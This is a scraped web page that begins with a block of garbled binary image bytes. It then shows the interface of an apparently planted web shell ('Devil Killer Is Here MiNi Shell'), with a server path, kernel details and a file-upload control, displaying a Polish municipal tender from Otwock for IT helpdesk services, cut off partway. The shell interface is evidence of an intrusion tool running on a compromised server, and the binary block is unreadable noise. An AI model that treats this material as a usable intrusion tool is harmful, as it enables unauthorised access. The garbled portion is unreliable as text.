JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241231/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241231/0068228601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług wsparcia użytkowników sieci komputerowej Urzędu Miasta Otwocka oraz prowadzenia prac konserwacyjno - logistyczno - organizacyjnych związanych z utrzymaniem tej sieci - helpdesk IT. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Otwock</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013268770</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@otwock.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.otwock.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług wsparcia użytkowników sieci komputerowej Urzędu Miasta Otwocka oraz prowadzenia prac konserwacyjno - logistyczno - organizacyjnych związanych z utrzymaniem tej sieci - helpdesk IT. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-58256de6-cc01-4d4c-9111-ff46389ce2d6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00682286</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://otwock.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja za pośrednictwem strony https://otwock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu<br/>Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz<br/>informacji:1.1. Elektronicznie za pośrednictwem Platformy znajdującej się pod adresem: https://otwock.ezamawiajacy.pl w<br/>zakładce„Korespondencja”.2. Ogólne zasady korzystania z Platformy, ;2.1.zgłoszenie do postępowania wymaga zalogowania<br/>Wykonawcy do Systemu na subdomenie Miasto Otwock ; https://otwock.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.2.2.<br/>Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki<br/>procesu rejestracyjnego; podaje adres e -mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”. 2.3. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci<br/>elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości<br/>przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>2.4.Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.3.Zamawiający zgodnie określa dopuszczalny format podpisu elektronicznego, jako:3.1. dokumenty w formacie<br/>„pdf&#34; zaleca się podpisywać formatem PAdES,3.2. dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie<br/>wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu<br/>oddzielny plik z podpisem.4.Zamawiający określa<br/>dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB wtxt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx,<br/>pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml,<br/>css, xml, xsd,gml, rng, xsl,xslt,TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.5. Zamawiający określa informacje na temat<br/>kodowania i czasu odbioru danych tj.:5.1. Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w<br/>Systemie, jako zaszyfrowany – format kodowania UTF8.Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu otwarcia ofert.6. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny<br/>czas (hh:mm:ss).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.61.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadania Wykonawcy w trakcie realizacji zamówienia:<br/>1. W zakresie urządzeń i systemów komputerowych:<br/>a)	Obsługa użytkowników w godz. 8.00-16.00, w tym w każdy poniedziałek w godz. 08:00-18:00 (w siedzibie urzędu – obsługa na miejscu) przez 3 osoby oddelegowane do pracy w siedzibie Zamawiającego (w tym 1 koordynator). <br/>b)	Praca w systemie Microsoft Windows Server Standard 2016-2022 – infrastrukturę teleinformatyczną zapewnia Zamawiający.<br/>c)	Wsparcie wszystkich użytkowników przy pracy na komputerach i urządzeniach drukujących (drukarkach, kserokopiarkach, urządzeniach wielofunkcyjnych), identyfikacja <br/>i rozwiązywanie ich problemów związanych z obsługą i konfiguracją sprzętu komputerowego i oprogramowania, natychmiastowa realizacja wszystkich zgłoszeń, udzielanie instruktażu dotyczącego wykorzystywania sprzętu komputerowego oraz oprogramowania, konfiguracja kont pocztowych.<br/>d)	Konfiguracja i instalacja sterowników drukarek, urządzeń wielofunkcyjnych i wymiana tonerów.<br/>e)	Identyfikacja i rozwiązywanie usterek dot. sprzętu komputerowego, oprogramowania <br/>i połączeń sieciowych oraz zapewnienie obsługi logistyczno – organizacyjnej przy przekazywaniu sprzętu komputerowego do naprawy.<br/>f)	Identyfikacja i rozwiązywanie usterek związanych ze złośliwym oprogramowaniem oraz bezpieczeństwem komputera od strony użytkownika.<br/>g)	Dokonywanie instalacji oprogramowania i sprzętu komputerowego, jego modyfikacji, aktualizacji i konfiguracji w zależności od bieżących potrzeb i dokonywanych zakupów.<br/>h)	Przemieszczanie, przyłączanie i odłączanie sprzętu komputerowego w ramach sieci komputerowej Zamawiającego zgodnie z jego potrzebami.<br/>i)	Prowadzenie dokumentacji związanej z naprawami sprzętu komputerowego.<br/>j)	Przemieszczanie instalowanych części z przyporządkowaniem do środka trwałego oraz dokonywanie odpowiednich zapisów.<br/>k)	Współpraca z Zamawiającym w zakresie ewidencji wyposażenia informatycznego znajdującego się na stanie osobowym pracowników.<br/>l)	Kontakt z firmami serwisującymi sprzęt komputerowy, drukarkowy w ramach napraw gwarancyjnych i serwisowych. <br/>m)	Wykonywanie innych czynności wskazanych przez Zamawiającego polegających na wspieraniu użytkowników lokalnej sieci komputerowej Zamawiającego w codziennej pracy oraz prowadzeniu prac konserwacyjno – logistyczno – organizacyjnych związanych z utrzymaniem systemu.<br/>n)	Wymiana zużytych tonerów, tuszy do urządzeń drukujących (drukarki, kserokopiarki, urządzenia wielofunkcyjne), identyfikacja zgłaszanych usterek urządzeń drukujących <br/>i usuwanie drobnych usterek (np. zacięcia papieru itp.).<br/>o)	Dbałość o przestrzeganie procedur w zakresie wsparcia IT.<br/>p)	Wykonawca zobowiązany jest do prowadzenia ewidencji wszystkich przekazywanych zgłoszeń (również telefonicznych, e-mailowych i ustnych). Ewidencja musi być prowadzona na bieżąco i zawierać co najmniej:<br/>	rejestrację zgłoszenia obejmującą, co najmniej: osobę zgłaszającą,<br/>	osobę przyjmującą zgłoszenie, treść zgłoszenia oraz czas przyjęcia i zamknięcia zgłoszenia,<br/>	osobę wyznaczoną przez koordynatora helpdesku do realizacji zgłoszenia oraz wszelkie zmiany osoby wyznaczonej do realizacji,<br/>	czynności podjęte przez osobę wyznaczoną do realizacji ze szczególnym uwzględnieniem: informacji identyfikujących sprzęt, którego dotyczy zgłoszenie oraz opisu sposobu rozwiązania problemu,<br/>	w przypadku, gdy nie udało się rozwiązać problemu, zgłoszenie uzupełnione <br/>o opis podjętych działań i zidentyfikowanych problemów ma być drogą elektroniczną przekazane do osoby nadzorującej pracę ze strony Zamawiającego.<br/>2. W zakresie urządzeń i systemów łączności przewodowej i bezprzewodowej:<br/>a)	Zabezpieczenie komunikacji z siecią Internet (współpraca z operatorami telekomunikacyjnymi) oraz obsługa routerów i systemów klasy firewall.<br/>b)	Zapewnienie bezpiecznej wymiany danych w sieci wewnętrznej i bezpiecznej teletransmisji danych w sieci LAN / WAN.<br/>c)	Dbanie o poprawne funkcjonowanie systemów łączności przewodowej i bezprzewodowej, w tym sieci telefonicznej i światłowodowej.<br/>d)	Odpowiednie gospodarowanie sprzętem łączności Zamawiającego, w tym, przeprowadzanie konserwacji, montażu i napraw oraz prowadzenie odpowiedniej dokumentacji w tym zakresie.<br/>e)	Współpraca z firmami zewnętrznymi świadczącymi usługi serwisowe, gwarancyjne <br/>i pogwarancyjne związane z usuwaniem awarii sprzętu i oprogramowania.<br/>3. W zakresie branżowych systemów informatycznych:<br/>a)	Opieka nad systemem poczty e-mail (usługa dostarczana przez zewnętrzny podmiot).<br/>b)	Wsparcie techniczne dotyczące programów wykorzystywanych w Urzędzie Miasta Otwocka (m.in. Infosystem/eZD/Sage/).<br/>c)	Wsparcie techniczne dotyczące programu Microsoft Windows / Windows Server, Linux Ubuntu, Debian.<br/>d)	Wsparcie techniczne dotyczące wirtualizacji Microsoft Hyper-V / Nutanix / Proxmox.<br/>e)	Wsparcie techniczne dotyczące ePUAP.<br/>f)	Wsparcie techniczne w zakresie wykorzystywanych przez Zamawiającego systemów bankowości elektronicznej.<br/>g)	Współpraca z firmami zewnętrznymi świadczącymi usługi serwisowe, gwarancyjne <br/>i pogwarancyjne związane z usuwaniem awarii oprogramowania. <br/>4. W zakresie realizacji obowiązków wynikających z pełnienia funkcji Administratora Systemu Informatycznego (ASI):<br/>a)	Sprawowanie nadzoru nad działaniem systemu informatycznego w instytucji Zamawiającego, w szczególności systemu służącego do przetwarzania danych osobowych.<br/>b)	Zarządzanie i bieżący nadzór nad systemem informatycznym i jego zabezpieczeniami. <br/>c)	Przydzielanie poszczególnym użytkownikom systemu informatycznego identyfikatora <br/>i hasła dostępu.<br/>d)	Modyfikacja i usuwanie dostępu użytkowników zgodnie z określonymi zasadami.<br/>e)	Nadzór nad działaniem mechanizmów uwierzytelniania użytkowników oraz kontrola dostępu do danych osobowych.<br/>f)	Działania w zakresie ustalania i kontroli identyfikatorów dostępu do systemu informatycznego oraz poszczególnych stacji roboczych.<br/>g)	Bieżące monitorowanie zabezpieczeń systemu oraz podejmowanie odpowiednich działań w przypadku stwierdzenia naruszenia tych zabezpieczeń oraz współpraca <br/>z Inspektorem Ochrony Danych (IOD) w usuwaniu skutków naruszenia zabezpieczeń.<br/>h)	Wykonywanie napraw, konserwacji oraz likwidacji urządzeń komputerowych zawierających dane osobowe) wykonywanie, przechowywanie i sprawdzanie pod kątem przydatności kopii zapasowych zbiorów danych osobowych.<br/>5. W zakresie prowadzenia dokumentacji: <br/>a)	Weryfikacja merytorycznej poprawności wykonania usług podwykonawczych związanych tematycznie z zakresem współpracy Wykonawcy z Zamawiającym, np. opisywanie faktur zakupowych sprzętu, usług telekomunikacyjnych itp.<br/>6. Pozostałe zadania:<br/>a)	Konsultacje i doradztwo w zakresie modernizacji infrastruktury informatycznej <br/>i usprawnienia jej działania.<br/>b)	Wsparcie w ramach prowadzonych postepowań przetargowych dotyczących IT. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 305 pkt 1) w związku z art. 214 ust. 1 pkt. 7 o wartości netto: do kwoty 120 000,00 zł. w zakresie polegającym na powtórzeniu podobnych rodzajowo prac zgodnych z przedmiotem zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby skierowanej do realizacji zamówienia jako kierownik</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie i Kwalifikacje zawodowe osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych:<br/>1)	w art. 108 ust. 1 p.z.p. Wykluczenie Wykonawcy następuje zgodnie z art. 111 p.z.p. <br/>2) w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Wykluczenie Wykonawcy następuje na okres trwania okoliczności określonych w/w art. 7 ust 1.<br/><br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące zdolności technicznej lub zawodowej: <br/><br/>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że:<br/><br/>A. w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, świadczył lub świadczy należycie, przez okres co najmniej 8 miesięcy, minimum dwie usługi polegające na świadczeniu usługi wsparcia minimum 100 użytkowników sieci komputerowej (Help Desk IT), o wartości nie mniejszej niż 60 000,00 zł brutto każda. <br/><br/>W przypadku usług nadal wykonywanych faktycznie zrealizowany zakres zamówienia na dzień składania ofert musi spełniać warunki określone powyżej.<br/><br/>W przypadku, gdy wymagane usługi są częścią większych zamówień dotyczących szerszego<br/>zakresu prac, należy podać tylko wartość usług dotyczących wymaganego przez<br/>Zamawiającego zakresu i tylko takie usługi należy wymienić.<br/><br/>Wyżej wymienione usługi mogą być wykonane w ramach jednego lub odrębnych zamówień.<br/><br/>W przypadku wykazania wymienionych wyżej usług w jednym lub kilku zamówieniach wykonawca musi określić w wykazie wykonanych usług wartość brutto wymienionych wyżej usług (osobno wartość każdej usługi).<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek musi spełniać w całości co najmniej jeden z Wykonawców Konsorcjantów<br/> <br/>B. dysponuje/będzie dysponować w celu realizacji zamówienia następującą ilości osób o wskazach kompetencjach:<br/><br/>Obszar zadań Zapotrzebowanie<br/>	administrowanie infrastrukturą IT<br/>	utrzymanie systemów IT<br/>	zapewnienie bezpieczeństwa systemów IT<br/>	administrowanie siecią komputerową	3 osoby niezwłocznie po podpisaniu umowy, w tym koordynator; możliwe jest łączenie kompetencji w ramach kilku obszarów<br/>wsparcie infrastruktury (helpdesk)	2 osoby niezwłocznie po podpisaniu umowy<br/><br/>o minimalnych wymaganiach:<br/><br/>Nazwa kompetencji	Podstawowe wymagania w zakresie posiadanej wiedzy, doświadczenia <br/>i umiejętności<br/>administrowanie infrastrukturą IT		znajomość scentralizowanych rozwiązań do zarządzania infrastrukturą i zdalnej obsługi użytkowników,<br/>	znajomość topologii sieci opartych o protokoły TCP/IP,<br/>	minimum 3 lata doświadczenia w projektach dotyczących administrowania infrastrukturą IT,<br/>	minimum roczne doświadczenie w zarządzaniu infrastrukturą informatyczną dla co najmniej 50 użytkowników we wspólnym LAN / WAN, obejmujące praktyczne umiejętności administrowania serwerami Windows/Linux (Debian, Ubuntu), serwerów aplikacyjnych, pocztowych i baz danych opartych o system operacyjny Windows,<br/>	udokumentowane ukończone szkolenia z administrowania serwerami,<br/>	umiejętność pracy w zespole, w tym komunikatywność, pozwalająca na sprawną realizację powierzonych zadań,<br/>	samodzielność w realizacji zadań, w tym umiejętność szukania rozwiązań dla trudnych zadań<br/><br/>utrzymanie systemów IT		znajomość systemów opartych o architekturę GNU/Linux (w tym Debian i Ubuntu),<br/>	znajomość technologii wirtualizacji (w szczególności środowisko ProxMox i Hyper-V),<br/>	minimum 4 lata doświadczenia w projektach dotyczących utrzymania systemów IT,<br/>	umiejętność pracy z systemem kontroli wersji GIT,<br/>	umiejętność pracy w zespole, w tym komunikatywność, pozwalająca na sprawną realizację powierzonych zadań,<br/>	samodzielność w realizacji zadań, w tym umiejętność szukania rozwiązań dla trudnych zadań<br/><br/>zapewnienie bezpieczeństwa systemów IT		wiedza z zakresu Bezpieczeństwa Systemów i Sieci Teleinformatycznych, Bezpieczeństwa Informacji, naruszeń i nadużyć, Informatyki Śledczej,<br/>	umiejętność wdrażania i monitorowania systemów bezpieczeństwa, analiz zdarzeń naruszeniowych, powłamaniowych, raportowania, projektowania i implementowania rozwiązań,<br/>	umiejętność prowadzenia analizy ryzyka w zakresie cyberbezpieczeństwa,<br/>	znajomość technik zabezpieczeń aplikacji webowych,<br/>	umiejętność weryfikacji oraz oceny skuteczności zastosowanych mechanizmów IT, dotyczących m.in.: systemów operacyjnych, baz danych, systemów bezpieczeństwa (IPS/IDS, WAF, SIEM, AntyMalware, DLP, URL Filtering itp.), protokołów sieciowych i rozwiązań kryptograficznych,<br/>	umiejętność konfiguracji firewall’i sieciowych,<br/>	minimum 3 letnie doświadczenie w obszarze bezpieczeństwa informatycznego,<br/>	posiadanie 